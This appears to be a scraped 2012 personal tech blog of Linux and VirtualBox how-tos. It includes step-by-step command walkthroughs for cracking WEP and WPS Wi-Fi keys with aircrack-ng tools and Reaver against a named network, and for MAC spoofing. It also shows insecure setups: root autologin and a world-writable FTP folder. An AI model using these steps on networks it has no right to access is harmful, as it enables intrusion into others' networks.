frame.protocols contains "http:data" and data contains "
http contains "" && http.request.method == "text/html"
Friday, November 23, 2012
Tuesday, November 20, 2012
Monday, November 19, 2012
How to share folders between host and guest OS in VirtualBox
Once setting up the initial Virtualbox configuration, enter the guest Windows OS and type this to the command prompt to create a network drive to the host OS.
net use x: \\vboxsvr\sharename
In Ubuntu, u need to go to the terminal and type this command
sudo mount -t vboxsf sharename ~/Vbox
In Ubuntu, u need to go to the terminal and type this command
sudo mount -t vboxsf sharename ~/Vbox
* For Windows, the Host name is vboxsvr but in Linux the Host name is vboxsf.
**In Linux, u need to create folder first. I created Vbox and mounted the shared folder to this folder/mountpoint.
**In Linux, u need to create folder first. I created Vbox and mounted the shared folder to this folder/mountpoint.
***Note: "sharename" is the name of the folder which was shared.
Saturday, October 27, 2012
Setting up Debian based Linux to install/compile an application
This is a simple guide on how to prepare your Debian distribution such as Ubuntu to compile an application.
Firstly you need to install a GNU compiler.
sudo apt-get install make gcc g++ git-core
Then you need to install the other development packages that is needed for the applicaiton. This is an example of the development packages installation.
sudo apt-get install \
libsdl1.2-dev libsdl-ttf2.0-dev libvorbis-dev zlib1g-dev gettext libtheora-dev \
libjpeg8-dev libpng12-dev libcurl3-dev libsdl-mixer1.2-dev \
libxml2-dev libopenal-dev p7zip-full libcunit1-dev binutils-dev libxvidcore-dev libmxml-dev
If needed, then u need to install cunit to install the unittest suite.
sudo apt-get install libcunit1-dev
Install other development packages needed by the application.
Compilation time!!!
Now here comes the fun part. Compiling the source code so that it would be a running application. An example of what you must do could be like this.
This command would enable you to run a script called configure. Configure will set up all the required files etc before the main compiling. In other words, it will prepare a "makefile" before we run the new process.
To compile we will use the command:-
"make" is a UNIX utility that reads the "makefile" which has the sequence that the OS has to follow to compile the application.
For additional information on "make" please read the following.
How to install TrueCrypt to Ubuntu
Firstly, download the required TrueCrypt installation file for Linux.
Once downloaded, untar or unzip the file with this command.
tar -xzvf truecrypt-7.1a-linux-x86.tar.gz
Only 1 file will be extracted which is the installation file. This is the file which we need to install. This is actually a shell script file. So we need to run this shell script with either :-
1. sh
2. bash
sh truecrypt-7.1a-setup-x86
You can read further on running shell script here
Congratulations. TrueCrypt has been installed. Just type "truecrypt" to run it.
Saturday, October 20, 2012
VirtualBox -Cannot Register the Hard Drive Because a Hard Drive with UUID Already Exists
This is how you solve the problem of not being able to open an image from VirtualBox. The error should look like this.
Go to the C:\Program Files\Oracle\VirtualBox> directory on the Command Prompt.
Then type the following command. Remember that the path of the image has to be correct. And remember to use the " " also.
VBoxManage internalcommands sethduuid "C:\Program Files\Oracle\Windows XP\Windows XP.vmdk"
Your output should look like this.
This is how you solve the problem of not being able to open an image from VirtualBox. The error should look like this.
Go to the C:\Program Files\Oracle\VirtualBox> directory on the Command Prompt.
Then type the following command. Remember that the path of the image has to be correct. And remember to use the " " also.
VBoxManage internalcommands sethduuid "C:\Program Files\Oracle\Windows XP\Windows XP.vmdk"
Your output should look like this.
Monday, October 15, 2012
Monday, October 1, 2012
WINDOWS - create new file using "echo" and copy con
echo echo this is a test > test.bat
echo @echo this is a test > test2.bat
The @echo so that you do not see the command being execute
copy con
copy con test.txt
to exit ^z
echo echo this is a test > test.bat
echo @echo this is a test > test2.bat
The @echo so that you do not see the command being execute
copy con
copy con test.txt
to exit ^z
Unix/Linux - Navigating the File System
Command | Description |
cat filename | Displays a filename. |
cd dirname | Moves you to the directory identified. |
cp file1 file2 | Copies one file/directory to specified location. |
file filename | Identifies the file type (binary, text, etc). |
find filename dir | Finds a file/directory. |
head filename | Shows the beginning of a file. |
less filename | Browses through a file from end or beginning. |
ls dirname | Shows the contents of the directory specified. |
mkdir dirname | Creates the specified directory. |
more filename | Browses through a file from beginning to end. |
mv file1 file2 | Moves the location of or renames a file/directory. |
pwd | Shows the current directory the user is in. |
rm filename | Removes a file. |
rmdir dirname | Removes a directory. |
tail filename | Shows the end of a file. |
touch filename | Creates a blank file or modifies an existing file.s attributes. |
whereis filename | Shows the location of a file. |
which filename | Shows the location of a file if it is in your PATH. |
Unix/Linux File System
This is the root directory which should contain only the
directories needed at the top level of the file structure.
This is where the executable files are located. They are
available to all user.
These are device drivers.
Supervisor directory commands, configuration files, disk
configuration files, valid user lists, groups, ethernet, hosts, where to send
critical messages.
Contains shared library files and sometimes other kernel-related
Contains files for booting the system.
Contains the home directory for users and other accounts.
Used to mount other temporary file systems, such as cdrom and
floppy for the CD-ROM drive and floppy diskette drive, respectively
Contains all processes marked as a file by process number or
other information that is dynamic to the system.
Holds temporary files used between system boots
Used for miscellaneous purposes, or can be used by many users.
Includes administrative commands, shared files, library files, and others
Typically contains variable-length files such as log and print
files and any other type of file that may contain a variable amount of data
Contains binary (executable) files, usually for system
administration. For example fdisk and ifconfig utlities.
Contains kernel files
vsftpd - Very Secure FTP Daemon
[root@bordeaux saini]$ cd /var/ftp/
[root@bordeaux ftp]$ mkdir SharedMovies
[root@bordeaux ftp]$ mount --bind /home/saini/Movies/ /var/ftp/SharedMovies/
[root@bordeaux saini]$ chown ftp:ftp Upload
[root@bordeaux saini]$ chmod 777 Upload
[root@bordeaux saini]$ mkdir /var/ftp/Uploads
[root@bordeaux saini]$ mount --bind /home/saini/Upload/ /var/ftp/Uploads/
service vsftpd restart
execute = 001 in binary = 1 in octal
write = 010 in binary = 2 in octal
read = 100 in binary = 4 in octal
So where does the 7 come from?
7 in binary = 111 in decimal = read, write, execute
So you get:
read write execute = 111 = 1 + 2 + 4 = 7
read write no execute = 110 = 4 + 2 = 6
read no write execute = 101 = 4 + 1 = 5
read no write no execute = 100 = 4
no read write execute = 011 = 2 + 1 = 3
no read write no execute = 010 = 2
no read no write execute = 001 = 1
no read no write no execute = 000 = 0
Monday, September 3, 2012
If Reaver is not able to associate
If Reaver returns
[!] WARNING: Failed to associate with 90:94:E4:29:14:64 (ESSID: nadzhomie70@unifi)
Then try using aireplay-ng to associate with the BSSID
airreplay-ng -1 0 -a (BSSID) (mon interface)
aireplay-ng -1 0 -a 90:94:E4:29:14:64 mon0
When trying this command,
08:34:51 Waiting for beacon frame (BSSID: 90:94:E4:29:14:64) on channel 10
08:34:51 mon0 is on channel 10, but the AP uses channel 11
So i was scanning the wrong channel.
Redo Reaver and manually enter the channel number.
Note from
So this time
airodump-ng -c 11 wlan0
reaver -i mon0 -b 90:94:E4:29:14:64 -c 11 -vv -A
-A is not to associate with the AP. Let aireplay-ng accosicate with the AP
Change the MAC address if needed.
[!] WARNING: Failed to associate with 90:94:E4:29:14:64 (ESSID: nadzhomie70@unifi)
Then try using aireplay-ng to associate with the BSSID
airreplay-ng -1 0 -a (BSSID) (mon interface)
aireplay-ng -1 0 -a 90:94:E4:29:14:64 mon0
When trying this command,
08:34:51 Waiting for beacon frame (BSSID: 90:94:E4:29:14:64) on channel 10
08:34:51 mon0 is on channel 10, but the AP uses channel 11
So i was scanning the wrong channel.
Redo Reaver and manually enter the channel number.
Note from
Try to use the -A option with aireplay-ng. reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 11 -e network_name -vv -A aireplay-ng -1 30 -a "mac AP" -h "mac client" -e "network name" mon0 sometimes aireplay-ng does listen on a wrong channel. Simply run airodump-ng once on the right channel to fix that. airodump-ng -c 11 wlan0
So this time
airodump-ng -c 11 wlan0
reaver -i mon0 -b 90:94:E4:29:14:64 -c 11 -vv -A
-A is not to associate with the AP. Let aireplay-ng accosicate with the AP
Change the MAC address if needed.
Friday, August 17, 2012
Auto start BackTrack
To enable BackTrack to AutoStart without password, you will need to install rungetty and a few other tweeks.
1. Install Rungetty
apt-get install rungetty
2. Now you have to edit the conf file of getty.
vi /etc/init/tty1.conf
Go down to exec /sbin/getty -9 38400 tty1, and put a # in front of it
#exec /sbin/getty -9 38400 tty1
After doing that, you need to add this line
exec /sbin/rungetty tty1 --autologin root
3. Now ur done editing this file and you need to save and exit
Press "Esc" to exit insert mode. Then type :x to save and exit
4. Now we need to create a bash file to run BackTrack automatically.
Lets view is the bash profile is there.
ls /root/.bash_profile
file does not exist. Lets create the .bash_profile file now. We are going to use "touch" as it will also include current time stamp on the newly create file.
touch ~/.bash_profile
~ is show the current directory. If you want to know the current directory, just type "pwd".
5. Since the .bash_profile file is empty, we need to edit and enter values in it.
vi /root/.bash_profile
once you are in insert mode , just add 1 line
Now save and exit. There you go. Now you can start running BackTrack without login in.
1. Install Rungetty
apt-get install rungetty
2. Now you have to edit the conf file of getty.
vi /etc/init/tty1.conf
Go down to exec /sbin/getty -9 38400 tty1, and put a # in front of it
#exec /sbin/getty -9 38400 tty1
After doing that, you need to add this line
exec /sbin/rungetty tty1 --autologin root
3. Now ur done editing this file and you need to save and exit
Press "Esc" to exit insert mode. Then type :x to save and exit
4. Now we need to create a bash file to run BackTrack automatically.
Lets view is the bash profile is there.
ls /root/.bash_profile
file does not exist. Lets create the .bash_profile file now. We are going to use "touch" as it will also include current time stamp on the newly create file.
touch ~/.bash_profile
~ is show the current directory. If you want to know the current directory, just type "pwd".
5. Since the .bash_profile file is empty, we need to edit and enter values in it.
vi /root/.bash_profile
once you are in insert mode , just add 1 line
Now save and exit. There you go. Now you can start running BackTrack without login in.
Thursday, August 16, 2012
Cracking WPA with reaver (actually cracking WPS)
1) To view wireless interfaces
2) Put wireless interface into monitoring mode
airmon-ng start wlan1
3) Scan all the BSSID in the area
airodump-ng mon0
4) Using reaver to crack the WPS
reaver -i (moninterface) -b (bssid) -vv
reaver -i mon0 -b 90:94:E4:29:14:64 -vv
Sunday, August 12, 2012
Changing MAC Address
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
ifconfig (interface) up
macchanger --mac 00:11:22:33:44:55 (interface)
ifconfig (interface) up
How to crack WEP via Backtrack 5
1. Check for WLAN interface
2. Start MONITORING on WLAN interface
airmon-ng start (WLAN interface)
=> airmon-ng start wlan0
3. Now a new MONITOR interface is created (mon0). Sniff existing WiFi network.
airodump-ng mon0
Now, you can see all the BSSID and also clients connecting to the AP. Choose a WEP BSSID to crack.
Keep track of the BSSID, channel and Data.
Type Ctrl+C to stop scan
4. Time to scan the specific BSSID.
Open a new Terminal.
airodump-ng -w wep -c (channel no) --bssid (bssid) (monitor interface)
=> airodump-ng -w wep -c 6 --bssid 90:32:00:00:44:11 mon0
5. Associating aireplay with mon0
Open a new Terminal.
aireplay-ng -1 0 -a (bssid) (monitoring interface)
=> aireplay-ng -1 0 -a 90:32:00:00:44:11 mon0
6. Sending Packets to the BSSID and gathering back Packets for decrypting the WEP key.
Open a new Terminal
aireplay-ng -3 -b (bssid) (monitor interface)
=> aireplay-ng -3 -b 90:32:00:00:44:11 mon0
7. Time to decrypt the WEP key.
Go back to the Terminal of Item "4" (Scanning specific BSSID).
Check to see if Beacon or Data has reached 3,000 packets. The previous Item will increase the packet amount.
Open a new Terminal
aircrack-ng wep-01.cap
The WEP key is beside the key found. Just drop the colon :
Have a good try on your own WiFi Router. Do not try it on other WiFi AP.
2. Start MONITORING on WLAN interface
airmon-ng start (WLAN interface)
=> airmon-ng start wlan0
3. Now a new MONITOR interface is created (mon0). Sniff existing WiFi network.
airodump-ng mon0
Now, you can see all the BSSID and also clients connecting to the AP. Choose a WEP BSSID to crack.
Keep track of the BSSID, channel and Data.
Type Ctrl+C to stop scan
4. Time to scan the specific BSSID.
Open a new Terminal.
airodump-ng -w wep -c (channel no) --bssid (bssid) (monitor interface)
=> airodump-ng -w wep -c 6 --bssid 90:32:00:00:44:11 mon0
5. Associating aireplay with mon0
Open a new Terminal.
aireplay-ng -1 0 -a (bssid) (monitoring interface)
=> aireplay-ng -1 0 -a 90:32:00:00:44:11 mon0
6. Sending Packets to the BSSID and gathering back Packets for decrypting the WEP key.
Open a new Terminal
aireplay-ng -3 -b (bssid) (monitor interface)
=> aireplay-ng -3 -b 90:32:00:00:44:11 mon0
7. Time to decrypt the WEP key.
Go back to the Terminal of Item "4" (Scanning specific BSSID).
Check to see if Beacon or Data has reached 3,000 packets. The previous Item will increase the packet amount.
Open a new Terminal
aircrack-ng wep-01.cap
The WEP key is beside the key found. Just drop the colon :
Have a good try on your own WiFi Router. Do not try it on other WiFi AP.
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